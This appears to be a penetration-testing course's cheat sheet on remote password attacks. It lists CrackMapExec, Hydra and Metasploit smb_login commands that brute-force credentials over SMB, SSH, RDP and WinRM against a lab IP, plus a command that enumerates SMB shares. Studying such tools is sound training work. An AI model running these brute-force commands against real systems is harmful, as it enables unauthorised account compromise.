Remote Password Attacks

CrackMapExec

General Usage

$ crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

Sample Command

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

Getting SMB Shares

$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

Hydra

SMB

$ hydra -L user.list -P password.list smb://10.129.42.197

SSH

$ hydra -L user.list -P password.list ssh://10.129.42.197

RDP

$ hydra -L user.list -P password.list rdp://10.129.42.197

MSFConsole

SMB

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set user_file user.list
msf6 auxiliary(scanner/smb/smb_login) > set pass_file password.list
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 10.129.42.197
msf6 auxiliary(scanner/smb/smb_login) > run
PreviousPassword MutationsNextWindows Local Password Attacks

Last updated